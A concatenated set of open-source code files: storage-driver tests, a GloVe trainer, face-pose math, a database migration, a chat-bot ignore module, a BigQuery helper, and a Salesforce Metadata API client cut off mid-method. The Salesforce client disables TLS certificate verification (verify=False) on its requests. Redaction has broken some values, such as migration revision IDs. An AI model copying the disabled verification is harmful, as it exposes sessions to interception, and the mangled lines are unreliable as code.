self.assertIn('secondary_unity', devices)
rep_device = devices['secondary_unity']
self.assertEqual('2.2.2.2', rep_device.san_ip)
self.assertEqual('user1', rep_device.san_login)
self.assertEqual('<PASSWORD>', rep_device.san_password)
self.assertTrue(self.replication_manager.is_replication_configured)
self.assertEqual('secondary_unity',
self.replication_manager.active_backend_id)
self.assertTrue(self.replication_manager.is_service_failed_over)
active_adapter = self.replication_manager.active_adapter
calls.append(mock.call())
self.assertIs(rep_device.adapter, active_adapter)
calls.append(mock.call())
mock_setup_adapter.assert_has_calls(calls)
@ddt.data(
{
'rep_device': [{
'backend_id': 'default', 'san_ip': '2.2.2.2'
}]
},
{
'rep_device': [{
'backend_id': 'secondary_unity', 'san_ip': '2.2.2.2'
}, {
'backend_id': 'default', 'san_ip': '3.3.3.3'
}]
},
{
'rep_device': [{
'backend_id': 'secondary_unity', 'san_ip': '2.2.2.2'
}, {
'backend_id': 'third_unity', 'san_ip': '3.3.3.3'
}]
},
)
@ddt.unpack
@mock.patch('cinder.volume.drivers.dell_emc.unity.'
'replication.ReplicationDevice.setup_adapter')
def test_do_setup_raise_invalid_rep_device(self, mock_setup_adapter,
rep_device):
self.driver.configuration.replication_device = rep_device
self.assertRaises(exception.InvalidConfigurationValue,
self.replication_manager.do_setup,
self.driver)
@mock.patch('cinder.volume.drivers.dell_emc.unity.'
'replication.ReplicationDevice.setup_adapter')
def test_do_setup_raise_invalid_active_backend_id(self,
mock_setup_adapter):
self.driver = driver.UnityDriver(configuration=self.config,
active_backend_id='third_unity')
self.assertRaises(exception.InvalidConfigurationValue,
self.replication_manager.do_setup,
self.driver)
@mock.patch('cinder.volume.drivers.dell_emc.unity.'
'replication.ReplicationDevice.setup_adapter')
def test_failover_service(self, mock_setup_adapter):
self.assertIsNone(self.replication_manager.active_backend_id)
self.replication_manager.do_setup(self.driver)
self.replication_manager.active_adapter
self.assertEqual('default',
self.replication_manager.active_backend_id)
self.replication_manager.failover_service('secondary_unity')
self.assertEqual('secondary_unity',
self.replication_manager.active_backend_id)
|
glove.py | tliu526/gram | 218 | 12685226 | import sys, time, random
import numpy as np
import theano
import theano.tensor as T
from theano import config
from theano.ifelse import ifelse
import cPickle as pickle
from collections import OrderedDict
def numpy_floatX(data):
return np.asarray(data, dtype=config.floatX)
def unzip(zipped):
new_params = OrderedDict()
for k, v in zipped.iteritems():
new_params[k] = v.get_value()
return new_params
def init_params(options):
params = OrderedDict()
inputSize = options['inputSize']
dimensionSize = options['dimensionSize']
rng = np.random.RandomState(1234)
params['w'] = np.asarray(rng.uniform(low=-0.1, high=0.1, size=(inputSize, dimensionSize)), dtype=theano.config.floatX)
rng = np.random.RandomState(12345)
params['w_tilde'] = np.asarray(rng.uniform(low=-0.1, high=0.1, size=(inputSize, dimensionSize)), dtype=theano.config.floatX)
params['b'] = np.zeros(inputSize).astype(theano.config.floatX)
params['b_tilde'] = np.zeros(inputSize).astype(theano.config.floatX)
return params
def init_tparams(params):
tparams = OrderedDict()
for k, v in params.iteritems():
tparams[k] = theano.shared(v, name=k)
return tparams
def build_model(tparams, options):
weightVector = T.vector('weightVector', dtype=theano.config.floatX)
iVector = T.vector('iVector', dtype='int32')
jVector = T.vector('jVector', dtype='int32')
cost = weightVector * (((tparams['w'][iVector] * tparams['w_tilde'][jVector]).sum(axis=1) + tparams['b'][iVector] + tparams['b_tilde'][jVector] - T.log(weightVector)) ** 2)
return weightVector, iVector, jVector, cost.sum()
def adadelta(tparams, grads, weightVector, iVector, jVector, cost):
zipped_grads = [theano.shared(p.get_value() * numpy_floatX(0.), name='%s_grad' % k) for k, p in tparams.iteritems()]
running_up2 = [theano.shared(p.get_value() * numpy_floatX(0.), name='%s_rup2' % k) for k, p in tparams.iteritems()]
running_grads2 = [theano.shared(p.get_value() * numpy_floatX(0.), name='%s_rgrad2' % k) for k, p in tparams.iteritems()]
zgup = [(zg, g) for zg, g in zip(zipped_grads, grads)]
rg2up = [(rg2, 0.95 * rg2 + 0.05 * (g ** 2)) for rg2, g in zip(running_grads2, grads)]
f_grad_shared = theano.function([weightVector, iVector, jVector], cost, updates=zgup + rg2up, name='adadelta_f_grad_shared')
updir = [-T.sqrt(ru2 + 1e-6) / T.sqrt(rg2 + 1e-6) * zg for zg, ru2, rg2 in zip(zipped_grads, running_up2, running_grads2)]
ru2up = [(ru2, 0.95 * ru2 + 0.05 * (ud ** 2)) for ru2, ud in zip(running_up2, updir)]
param_up = [(p, p + ud) for p, ud in zip(tparams.values(), updir)]
f_update = theano.function([], [], updates=ru2up + param_up, on_unused_input='ignore', name='adadelta_f_update')
return f_grad_shared, f_update
def weightFunction(x):
if x < 100.0:
return (x / 100.0) ** 0.75
else:
return 1
def load_data(infile):
cooccurMap = pickle.load(open(infile, 'rb'))
I = []
J = []
Weight = []
for key, value in cooccurMap.iteritems():
I.append(key[0])
J.append(key[1])
Weight.append(weightFunction(value))
shared_I = theano.shared(np.asarray(I, dtype='int32'), borrow=True)
shared_J = theano.shared(np.asarray(J, dtype='int32'), borrow=True)
shared_Weight = theano.shared(np.asarray(Weight, dtype=theano.config.floatX), borrow=True)
return shared_I, shared_J, shared_Weight
def print2file(buf, outFile):
outfd = open(outFile, 'a')
outfd.write(buf + '\n')
outfd.close()
def train_glove(infile, inputSize=20000, batchSize=100, dimensionSize=100, maxEpochs=1000, outfile='result', x_max=100, alpha=0.75):
options = locals().copy()
print 'initializing parameters'
params = init_params(options)
tparams = init_tparams(params)
print 'loading data'
I, J, Weight = load_data(infile)
n_batches = int(np.ceil(float(I.get_value(borrow=True).shape[0]) / float(batchSize)))
print 'building models'
weightVector, iVector, jVector, cost = build_model(tparams, options)
grads = T.grad(cost, wrt=tparams.values())
f_grad_shared, f_update = adadelta(tparams, grads, weightVector, iVector, jVector, cost)
logFile = outfile + '.log'
print 'training start'
for epoch in xrange(maxEpochs):
costVector = []
iteration = 0
for batchIndex in random.sample(range(n_batches), n_batches):
cost = f_grad_shared(Weight.get_value(borrow=True, return_internal_type=True)[batchIndex*batchSize:(batchIndex+1)*batchSize],
I.get_value(borrow=True, return_internal_type=True)[batchIndex*batchSize: (batchIndex+1)*batchSize],
J.get_value(borrow=True, return_internal_type=True)[batchIndex*batchSize: (batchIndex+1)*batchSize])
f_update()
costVector.append(cost)
if (iteration % 1000 == 0):
buf = 'epoch:%d, iteration:%d/%d, cost:%f' % (epoch, iteration, n_batches, cost)
print buf
print2file(buf, logFile)
iteration += 1
trainCost = np.mean(costVector)
buf = 'epoch:%d, cost:%f' % (epoch, trainCost)
print buf
print2file(buf, logFile)
tempParams = unzip(tparams)
np.savez_compressed(outfile + '.' + str(epoch), **tempParams)
def get_rootCode(treeFile):
tree = pickle.load(open(treeFile, 'rb'))
return tree.values()[0][1]
if __name__=='__main__':
infile = sys.argv[1]
treeFile = sys.argv[2]
outfile = sys.argv[3]
inputDimSize = get_rootCode(treeFile+'.level2.pk') + 1
embDimSize = 128
batchSize = 100
maxEpochs = 50
train_glove(infile, inputSize=inputDimSize, batchSize=batchSize, dimensionSize=embDimSize, maxEpochs=maxEpochs, outfile=outfile)
|
demo/face/utils/estimate_pose.py | shachargluska/centerpose | 245 | 12685296 | <reponame>shachargluska/centerpose<gh_stars>100-1000
# coding: UTF-8
from math import asin, atan2, cos, sin
import numpy as np
def isRotationMatrix(R):
''' checks if a matrix is a valid rotation matrix(whether orthogonal or not)
'''
Rt = np.transpose(R)
shouldBeIdentity = np.dot(Rt, R)
I = np.identity(3, dtype=R.dtype)
n = np.linalg.norm(I - shouldBeIdentity)
return n < 1e-6
def matrix2angle(R):
''' compute three Euler angles from a Rotation Matrix. Ref: http://www.gregslabaugh.net/publications/euler.pdf
Args:
R: (3,3). rotation matrix
Returns:
x: yaw
y: pitch
z: roll
'''
# assert(isRotationMatrix(R))
if R[2, 0] != 1 or R[2, 0] != -1:
x = asin(R[2, 0])
y = atan2(R[2, 1] / cos(x), R[2, 2] / cos(x))
z = atan2(R[1, 0] / cos(x), R[0, 0] / cos(x))
else: # Gimbal lock
z = 0 # can be anything
if R[2, 0] == -1:
x = np.pi / 2
y = z + atan2(R[0, 1], R[0, 2])
else:
x = -np.pi / 2
y = -z + atan2(-R[0, 1], -R[0, 2])
return x, y, z
def P2sRt(P):
''' decompositing camera matrix P.
Args:
P: (3, 4). Affine Camera Matrix.
Returns:
s: scale factor.
R: (3, 3). rotation matrix.
t2d: (2,). 2d translation.
'''
t2d = P[:2, 3]
R1 = P[0:1, :3]
R2 = P[1:2, :3]
s = (np.linalg.norm(R1) + np.linalg.norm(R2)) / 2.0
r1 = R1 / np.linalg.norm(R1)
r2 = R2 / np.linalg.norm(R2)
r3 = np.cross(r1, r2)
R = np.concatenate((r1, r2, r3), 0)
return s, R, t2d
def compute_similarity_transform(points_static, points_to_transform):
# http://nghiaho.com/?page_id=671
p0 = np.copy(points_static).T
p1 = np.copy(points_to_transform).T
t0 = -np.mean(p0, axis=1).reshape(3, 1)
t1 = -np.mean(p1, axis=1).reshape(3, 1)
t_final = t1 - t0
p0c = p0 + t0
p1c = p1 + t1
covariance_matrix = p0c.dot(p1c.T)
U, S, V = np.linalg.svd(covariance_matrix)
R = U.dot(V)
if np.linalg.det(R) < 0:
R[:, 2] *= -1
rms_d0 = np.sqrt(np.mean(np.linalg.norm(p0c, axis=0) ** 2))
rms_d1 = np.sqrt(np.mean(np.linalg.norm(p1c, axis=0) ** 2))
s = (rms_d0 / rms_d1)
P = np.c_[s * np.eye(3).dot(R), t_final]
return P
def estimate_pose(vertices):
canonical_vertices = np.load('face/utils/uv_data/canonical_vertices.npy')
P = compute_similarity_transform(vertices, canonical_vertices)
_, R, _ = P2sRt(P) # decompose affine matrix to s, R, t
pose = matrix2angle(R)
return P, pose
|
migrations/versions/5177cfff57d7_add_testgroup_and_te.py | vault-the/changes | 443 | 12685314 | <reponame>vault-the/changes<filename>migrations/versions/5177cfff57d7_add_testgroup_and_te.py
"""Add TestGroup and TestSuite
Revision ID: 5177cfff57d7
Revises: <PASSWORD>
Create Date: 2013-11-04 12:42:37.249656
"""
from __future__ import absolute_import, print_function
# revision identifiers, used by Alembic.
revision = '5<PASSWORD>c<PASSWORD>'
down_revision = '<PASSWORD>'
from alembic import op
from datetime import datetime
from hashlib import sha1
from sqlalchemy.sql import table
from uuid import uuid4
import sqlalchemy as sa
def upgrade():
from changes.constants import Result
testsuites_table = table(
'testsuite',
sa.Column('id', sa.GUID(), nullable=False),
sa.Column('build_id', sa.GUID(), nullable=False),
sa.Column('project_id', sa.GUID(), nullable=False),
sa.Column('name_sha', sa.String(length=40), nullable=False),
sa.Column('name', sa.Text(), nullable=True),
sa.Column('date_created', sa.DateTime(), nullable=True),
)
testgroups_table = table(
'testgroup',
sa.Column('id', sa.GUID(), nullable=False),
sa.Column('build_id', sa.GUID(), nullable=False),
sa.Column('project_id', sa.GUID(), nullable=False),
sa.Column('name_sha', sa.String(length=40), nullable=False),
sa.Column('duration', sa.Integer(), nullable=True),
sa.Column('num_tests', sa.Integer(), nullable=True),
sa.Column('num_failed', sa.Integer(), nullable=True),
sa.Column('name', sa.Text(), nullable=True),
sa.Column('date_created', sa.DateTime(), nullable=True),
)
testgroups_m2m_table = table(
'testgroup_test',
sa.Column('group_id', sa.GUID(), nullable=False),
sa.Column('test_id', sa.GUID(), nullable=False),
)
testcases_table = table(
'test',
sa.Column('id', sa.GUID(), nullable=False),
sa.Column('build_id', sa.GUID(), nullable=False),
sa.Column('project_id', sa.GUID(), nullable=False),
sa.Column('package', sa.Text(), nullable=True),
sa.Column('name', sa.Text(), nullable=True),
sa.Column('group', sa.Text(), nullable=True),
sa.Column('suite_id', sa.GUID(), nullable=True),
sa.Column('duration', sa.Integer(), nullable=True),
sa.Column('result', sa.Enum(), nullable=True),
)
connection = op.get_bind()
### commands auto generated by Alembic - please adjust! ###
op.create_table('testsuite',
sa.Column('id', sa.GUID(), nullable=False),
sa.Column('build_id', sa.GUID(), nullable=False),
sa.Column('project_id', sa.GUID(), nullable=False),
sa.Column('name_sha', sa.String(length=40), nullable=False),
sa.Column('name', sa.Text(), nullable=True),
sa.Column('date_created', sa.DateTime(), nullable=True),
sa.ForeignKeyConstraint(['build_id'], ['build.id'], ),
sa.ForeignKeyConstraint(['project_id'], ['project.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('build_id','name_sha', name='_suite_key')
)
op.create_table('testgroup',
sa.Column('id', sa.GUID(), nullable=False),
sa.Column('build_id', sa.GUID(), nullable=False),
sa.Column('project_id', sa.GUID(), nullable=False),
sa.Column('suite_id', sa.GUID(), nullable=True),
sa.Column('parent_id', sa.GUID(), nullable=True),
sa.Column('name_sha', sa.String(length=40), nullable=False),
sa.Column('name', sa.Text(), nullable=True),
sa.Column('duration', sa.Integer(), default=0, nullable=True),
sa.Column('num_tests', sa.Integer(), default=0, nullable=True),
sa.Column('num_failed', sa.Integer(), default=0, nullable=True),
sa.Column('data', sa.JSONEncodedDict(), nullable=True),
sa.Column('date_created', sa.DateTime(), nullable=True),
sa.ForeignKeyConstraint(['build_id'], ['build.id'], ),
sa.ForeignKeyConstraint(['parent_id'], ['testgroup.id'], ),
sa.ForeignKeyConstraint(['project_id'], ['project.id'], ),
sa.ForeignKeyConstraint(['suite_id'], ['testsuite.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('build_id','suite_id','name_sha', name='_group_key')
)
op.create_table('testgroup_test',
sa.Column('group_id', sa.GUID(), nullable=False),
sa.Column('test_id', sa.GUID(), nullable=False),
sa.ForeignKeyConstraint(['group_id'], ['testgroup.id'], ),
sa.ForeignKeyConstraint(['test_id'], ['test.id'], ),
sa.PrimaryKeyConstraint('group_id', 'test_id')
)
op.add_column(u'test', sa.Column('suite_id', sa.GUID(), nullable=True))
# perform data migrations
for testcase in connection.execute(testcases_table.select()):
# migrate group to suite
print("Migrating TestCase %s" % (testcase.id,))
suite_name = testcase.group or 'default'
suite_sha = sha1(suite_name).hexdigest()
result = connection.execute(testsuites_table.select().where(sa.and_(
testsuites_table.c.build_id == testcase.build_id,
testsuites_table.c.name_sha == suite_sha,
)).limit(1)).fetchone()
if not result:
suite_id = uuid4()
connection.execute(
testsuites_table.insert().values(
id=suite_id,
build_id=testcase.build_id,
project_id=testcase.project_id,
name=suite_name,
name_sha=suite_sha,
date_created=datetime.utcnow(),
)
)
else:
suite_id = result[0]
connection.execute(
testcases_table.update().where(
testcases_table.c.id == testcase.id,
).values({
testcases_table.c.suite_id: suite_id,
})
)
# add package as group
group_name = testcase.package or testcase.name.rsplit('.', 1)[1]
group_sha = sha1(group_name).hexdigest()
result = connection.execute(testgroups_table.select().where(sa.and_(
testgroups_table.c.build_id == testcase.build_id,
testgroups_table.c.name_sha == group_sha,
)).limit(1)).fetchone()
if not result:
group_id = uuid4()
connection.execute(
testgroups_table.insert().values(
id=group_id,
build_id=testcase.build_id,
project_id=testcase.project_id,
name=group_name,
name_sha=group_sha,
date_created=datetime.utcnow(),
duration=0,
num_tests=0,
num_failed=0,
)
)
else:
group_id = result[0]
update_values = {
testgroups_table.c.num_tests: testgroups_table.c.num_tests + 1,
testgroups_table.c.duration: testgroups_table.c.duration + testcase.duration,
}
if testcase.result == Result.failed.value:
update_values[testgroups_table.c.num_failed] = testgroups_table.c.num_failed + 1
connection.execute(testgroups_m2m_table.insert().values({
testgroups_m2m_table.c.group_id: group_id,
testgroups_m2m_table.c.test_id: testcase.id,
}))
connection.execute(testgroups_table.update().where(
testgroups_table.c.id == group_id,
).values(update_values))
op.drop_column(u'test', u'group')
op.drop_column(u'test', u'group_sha')
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column(u'test', sa.Column(u'group_sha', sa.VARCHAR(length=40), nullable=True))
op.add_column(u'test', sa.Column(u'group', sa.TEXT(), nullable=True))
op.drop_column(u'test', 'suite_id')
op.drop_table('testgroup_test')
op.drop_table('testgroup')
op.drop_table('testsuite')
### end Alembic commands ###
|
python/graphscope/nx/tests/algorithms/forward/test_threshold.py | LI-Mingyu/GraphScope-MY | 1,521 | 12685342 | import networkx.algorithms.tests.test_threshold
import pytest
from graphscope.nx.utils.compat import import_as_graphscope_nx
from graphscope.nx.utils.compat import with_graphscope_nx_context
import_as_graphscope_nx(networkx.algorithms.tests.test_threshold,
decorators=pytest.mark.usefixtures("graphscope_session"))
from networkx.algorithms.tests.test_threshold import TestGeneratorThreshold
@pytest.mark.usefixtures("graphscope_session")
@with_graphscope_nx_context(TestGeneratorThreshold)
class TestGeneratorThreshold:
def test_eigenvectors(self):
np = pytest.importorskip('numpy')
eigenval = np.linalg.eigvals
scipy = pytest.importorskip('scipy')
cs = 'ddiiddid'
G = nxt.threshold_graph(cs)
(tgeval, tgevec) = nxt.eigenvectors(cs)
dot = np.dot
assert [abs(dot(lv, lv) - 1.0) < 1e-9 for lv in tgevec] == [True] * 8
def test_create_using(self):
cs = 'ddiiddid'
G = nxt.threshold_graph(cs)
assert pytest.raises(nx.exception.NetworkXError,
nxt.threshold_graph,
cs,
create_using=nx.DiGraph())
|
pajbot/modules/basic/ignore.py | UVClay/SkookumBot | 145 | 12685348 | import logging
from pajbot.managers.db import DBManager
from pajbot.models.command import Command
from pajbot.models.command import CommandExample
from pajbot.models.user import User
from pajbot.modules import BaseModule
from pajbot.modules import ModuleType
from pajbot.modules.basic import BasicCommandsModule
log = logging.getLogger(__name__)
class IgnoreModule(BaseModule):
ID = __name__.split(".")[-1]
NAME = "Ignore"
DESCRIPTION = "Ignore all commands from a user"
CATEGORY = "Feature"
ENABLED_DEFAULT = True
MODULE_TYPE = ModuleType.TYPE_ALWAYS_ENABLED
PARENT_MODULE = BasicCommandsModule
@staticmethod
def ignore_command(bot, source, message, **rest):
if not message:
return False
with DBManager.create_session_scope() as db_session:
username = message.split(" ")[0]
user = User.find_by_user_input(db_session, username)
if user == source:
bot.whisper(source, "You cannot ignore yourself")
return False
with DBManager.create_session_scope() as db_session:
user = User.find_by_user_input(db_session, username)
if user is None:
bot.whisper(source, "No user with that name found.")
return False
if user.ignored:
bot.whisper(source, "User is already ignored.")
return False
user.ignored = True
bot.whisper(source, f"Now ignoring {user}")
@staticmethod
def unignore_command(bot, source, message, **rest):
if not message:
return
username = message.split(" ")[0]
with DBManager.create_session_scope() as db_session:
user = User.find_by_user_input(db_session, username)
if not user:
bot.whisper(source, "No user with that name found.")
return False
if user.ignored is False:
bot.whisper(source, "User is not ignored.")
return False
user.ignored = False
bot.whisper(source, f"No longer ignoring {user}")
def load_commands(self, **options):
self.commands["ignore"] = Command.raw_command(
self.ignore_command,
level=1000,
description="Ignore a user, which means he can't run any commands",
examples=[
CommandExample(
None,
"Default usage",
chat="user:!ignore Karl_Kons\n" "bot>user:Now ignoring Karl_Kons",
description="Ignore user Karl_Kons",
).parse()
],
)
self.commands["unignore"] = Command.raw_command(
self.unignore_command,
level=1000,
description="Unignore a user",
examples=[
CommandExample(
None,
"Default usage",
chat="user:!unignore Karl_Kons\n" "bot>user:No longer ignoring Karl_Kons",
description="Unignore user Karl_Kons",
).parse()
],
)
|
src/main/resources/resource/I2cMux/I2cMux.py | holgerfriedrich/myrobotlab | 179 | 12685355 | <gh_stars>100-1000
port="COM3"
#
if ('virtual' in globals() and virtual):
virtualArduino = Runtime.start("virtualArduino", "VirtualArduino")
virtualArduino.connect(port)
ard = Runtime.createAndStart("Arduino","Arduino")
ard.connect(port)
#
i2cmux = Runtime.createAndStart("i2cMux","I2cMux")
# From version 1.0.2316 use attach instead of setController
# i2cmux.setController(ard,"1","0x70")
i2cmux.attach(ard,"1","0x70")
#
mpu6050_0 = Runtime.createAndStart("Mpu6050-0","Mpu6050")
mpu6050_0.attach(i2cmux,"0","0x68")
mpu6050_1 = Runtime.createAndStart("Mpu6050-1","Mpu6050")
mpu6050_1.attach(i2cmux,"1","0x68")
|
tools/sts-job-manager/lib/table_util.py | ruchirjain86/professional-services | 2,116 | 12685361 | <reponame>ruchirjain86/professional-services<filename>tools/sts-job-manager/lib/table_util.py
#!/usr/bin/env python3
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
The file contains a list of table-related operations.
"""
import logging
import os
from typing import List
from google.cloud import bigquery
from lib.options import BigQueryOptions
from lib.services import Services
logger = logging.getLogger(__name__)
logger.setLevel(os.environ.get("LOGLEVEL", "INFO").upper())
def create_table(client: Services.bigquery, options: BigQueryOptions,
table_name: str, schema: List[bigquery.SchemaField]):
"""
Creates tables. Does not throw if it exists.
"""
logger.debug(f"Creating `{table_name}` table if it does not exists...")
table_ref = get_table_ref(client, options, table_name)
table = bigquery.Table(table_ref, schema=schema)
client.create_table(table, exists_ok=True)
logger.debug("...done.")
def create_dataset(client: Services.bigquery, options: BigQueryOptions):
"""
Creates a dataset.
"""
dataset_ref = get_dataset_ref(client, options)
logger.info(
f"Creating dataset '{dataset_ref.dataset_id}' if it does not exist...")
dataset = bigquery.Dataset(dataset_ref)
dataset.location = options.dataset_location
dataset = client.create_dataset(dataset, exists_ok=True)
logger.info("...done.")
def get_dataset_ref(client: Services.bigquery, options: BigQueryOptions):
"""
Determine a dataset reference based on given parameters
"""
return bigquery.dataset.DatasetReference(client.project,
options.dataset_name)
def get_table_identifier(services: Services, options: BigQueryOptions,
table_name: str) -> str:
"""
Generates a table identifier in `PROJECT.DATASET.TABLE` format
"""
table_ref = get_table_ref(services.bigquery, options, table_name)
return '.'.join([table_ref.project, table_ref.dataset_id,
table_ref.table_id])
def get_table_ref(client: Services.bigquery, options: BigQueryOptions,
table_name: str):
"""
Determine a table reference based on given parameters
"""
dataset_ref = get_dataset_ref(client, options)
table_ref = bigquery.table.TableReference(dataset_ref, table_name)
return table_ref
|
salesforce/api/metadata.py | xjsender/haoide | 237 | 12685370 | <filename>salesforce/api/metadata.py<gh_stars>100-1000
import sublime
import time
import pprint
import os
import csv
import json
import datetime
from xml.sax.saxutils import unescape, quoteattr
from .. import xmltodict
from ..soap import SOAP
from ..login import soap_login, rest_login
from ... import requests, util
from ..lib.panel import Printer
class MetadataApi:
def __init__(self, settings, **kwargs):
self.settings = settings
self.api_version = settings["api_version"]
self.deploy_options = settings["deploy_options"]
self.soap = SOAP(settings)
self.session = None
self.result = None
def login(self, session_id_expired=False):
""" Login with default project credentials
Arguments:
* session_id_expired -- Optional; generally, session in .config/session.json is expired,
if INVALID_SESSION_ID appeared in response requested by session in session.json,
we need to call this method with expired session flag again
Returns:
* result -- Keep the session info, if `output_session_info` in plugin setting is True,
session info will be outputted to console
"""
if self.settings["login_type"] == "REST":
result = rest_login(self.settings, session_id_expired)
else:
result = soap_login(self.settings, session_id_expired)
if not result["success"]:
self.result = result
return self.result
self.metadata_url = result["instance_url"] + "/services/Soap/m/%s.0" % self.api_version
self.headers = {
"Content-Type": "text/xml;charset=UTF-8",
"SOAPAction": '""'
}
self.result = result
return result
def _invoke_method(self, _method, options={}):
""" Support below methods:
* describeMetadata
* readMetadata
* renameMetadata
* deleteMetadata
* cancelDeployment
"""
result = self.login()
if not result["success"]:
self.result = result
return self.result
# Build soap_body
body = self.soap.create_request(_method, options)
try:
response = requests.post(self.metadata_url,
body, verify=False, headers=self.headers)
except requests.exceptions.RequestException as e:
self.result = {
"Error Message": "Connection Timeout",
"success": False
}
return self.result
# If status_code is > 399, which means it has error
if response.status_code > 399:
# If session is invalid, force to login and execute this again
if "INVALID_SESSION_ID" in response.text:
Printer.get("log").write("Session is expired, need login again")
self.login(True)
return self._invoke_method(_method, options)
self.result = util.get_response_error(response)
return self.result
result = xmltodict.parse(response.content)
self.result = result["soapenv:Envelope"]["soapenv:Body"][_method + "Response"]["result"]
self.result["success"] = True
return self.result
def check_status(self, async_process_id, timeout=120):
""" Ensure the retrieve request is done and then we can
continue other work
* async_process_id -- retrieve request asyncProcessId
"""
# Headers and Body
headers = self.headers.copy()
headers["Accept-Encoding"] = "identity, deflate, compress, gzip"
soap_body = self.soap.create_request('check_status', {
"async_process_id": async_process_id
})
try:
session = requests.Session()
adapter = requests.adapters.HTTPAdapter(max_retries=10)
session.mount(self.metadata_url, adapter)
response = session.post(self.metadata_url, soap_body, verify=False,
headers=headers, timeout=timeout)
except requests.exceptions.RequestException as e:
self.result = {
"Error Message": "Network connection timeout when checking status for retrieve",
"success": False
}
return self.result
# If status_code is > 399, which means it has error
if response.status_code > 399:
self.result = util.get_response_error(response)
return self.result
result = xmltodict.parse(response.content)
self.result = result["soapenv:Envelope"]["soapenv:Body"]["checkStatusResponse"]["result"]
self.result["success"] = True
return self.result
def check_retrieve_status(self, async_process_id):
""" After async process is done, post a checkRetrieveStatus to
obtain the zipFile(base64)
Arguments:
* async_process_id -- asyncProcessId of retrieve request
"""
headers = self.headers.copy()
headers["Accept-Encoding"] = "identity, deflate, compress, gzip"
soap_body = self.soap.create_request('check_retrieve_status', {
"async_process_id": async_process_id
})
try:
session = requests.Session()
adapter = requests.adapters.HTTPAdapter(max_retries=10)
session.mount(self.metadata_url, adapter)
response = session.post(self.metadata_url, soap_body,
verify=False, headers=headers, timeout=120)
except requests.exceptions.RequestException as e:
self.result = {
"Error Message": "Network connection timeout when checking retrieve status",
"success": False
}
return self.result
# If status_code is > 399, which means it has error
if response.status_code > 399:
self.result = util.get_response_error(response)
return self.result
result = xmltodict.parse(response.content)
result = result["soapenv:Envelope"]["soapenv:Body"]["checkRetrieveStatusResponse"]["result"]
result["success"] = response.status_code < 399
return result
def retrieve(self, options, timeout=120):
""" 1. Issue a retrieve request to start the asynchronous retrieval and asyncProcessId is returned
2. Issue a checkRetrieveStatus request to check whether the async process job is completed.
3. After the job is completed, you will get the zipFile(base64)
4. Use Python Lib base64 to convert the base64 string to zip file.
5. Use Python Lib zipFile to unzip the zip file to path
Arguments:
* options -- {"types" : types_dict, "package_names": package_names}
"""
result = self.login()
if not result or not result["success"]:
self.result = result
return self.result
# Log the StartTime
start_time = datetime.datetime.now()
# Write a separate line
Printer.get('log').write_start()
# Before build soap_body, we need to check type supports *,
# if not, we need to list package for it
list_package_for_all = False
if "list_package_for_all" in options and options["list_package_for_all"]:
list_package_for_all = True
records = self.prepare_members(options["types"], list_package_for_all)
# Add types for options
_types = {}
for k, values in records.items():
if "*" in values:
_types[k] = values
else:
members = []
for v in values:
if isinstance(v, str):
members.append(v)
elif isinstance(v, dict):
members.append(v["fullName"])
_types[k] = members
options["types"] = _types
# [sf:retrieve]
Printer.get('log').write("[sf:retrieve] Start request for a retrieve...")
# Build soap_body
soap_body = self.soap.create_request('retrieve', options)
# Post retrieve request
try:
response = requests.post(self.metadata_url, soap_body, verify=False,
headers=self.headers, timeout=120)
except requests.exceptions.RequestException as e:
self.result = {
"Error Message": "Network connection timeout when issuing retrieve request",
"success": False
}
return self.result
# Check whether session_id is expired
if "INVALID_SESSION_ID" in response.text:
Printer.get('log').write("[sf:retrieve] Session expired, need login again")
result = self.login(True)
if not result["success"]:
self.result = result
return self.result
return self.retrieve(options)
# If status_code is > 399, which means it has error
if response.status_code > 399:
self.result = util.get_response_error(response)
return self.result
# [sf:retrieve]
Printer.get('log').write("[sf:retrieve] Request for a retrieve submitted successfully.")
# Get async process id
async_process_id = util.getUniqueElementValueFromXmlString(response.content, "id")
# [sf:retrieve]
Printer.get('log').write("[sf:retrieve] Request ID for the current retrieve task: "+async_process_id)
Printer.get('log').write("[sf:retrieve] Waiting for server to finish processing the request...")
# Check status until retrieve request is finished
done = "false"
while done == "false":
# Issue a check_status request to retrieve retrieve result
# Since version 31 before, we need to invoke check_status before check_retrieve_status
if self.settings["api_version"] >= 31:
result = self.check_retrieve_status(async_process_id)
else:
result = self.check_status(async_process_id)
# Catch exception of status retrieving
if not result or not result["success"]:
self.result = result
return self.result
status = result["state"] if self.api_version < 31 else result["status"]
done = result["done"]
# Display retrieve status in the output panel
Printer.get('log').write("[sf:retrieve] Request Status: %s" % status)
# Defer to issue request according to status
sleep_seconds = 2 if status in ["Queued", "Pending", "Succeeded"] else self.settings["metadata_polling_frequency"]
time.sleep(sleep_seconds)
# If check status request failed, this will not be done
if status == "Failed":
Printer.get('log').write("[sf:retrieve] Request Failed") # [sf:retrieve]
self.result = {
"success": False,
"Error Message": result["errorMessage"]
}
return self.result
# Since version 31, checkRetrieveStatus request is not required
if self.api_version < 31:
Printer.get('log').write("[sf:retrieve] Obtaining ZipFile...")
result = self.check_retrieve_status(async_process_id)
# Catch exception of status retrieve
if not result["success"]:
self.result = result
return self.result
# Output the message if have
if "messages" in result:
messages = result["messages"]
if isinstance(messages, dict):
messages = [messages]
for message in messages:
Printer.get('log').write("[sf:retrieve] %s - %s" % (
message["fileName"],
message["problem"]
))
# [sf:retrieve]
Printer.get('log').write("[sf:retrieve] Finished request %s successfully." % async_process_id)
# Build Successful
Printer.get('log').write("\n\nBUILD SUCCESSFUL", False)
# Total time
total_seconds = (datetime.datetime.now() - start_time).seconds
Printer.get('log').write("Total time: %s seconds" % total_seconds, False)
# print('meta retrive result', result)
self.result = result
def prepare_members(self, _types, list_package_for_all=False):
if not self.login():
return
if list_package_for_all:
Printer.get("log").write_start()
# List package for metadata objects which 'inFolder' is true
# EmailFolder, DocumentFolder, DashboardFolder and ReportFolder
records = []
for _type in _types:
if "*" not in _types[_type]:
continue
if _type in self.settings["metadata_objects_in_folder"]:
# List package for ``suffix.capitalize() + 'Folder'``
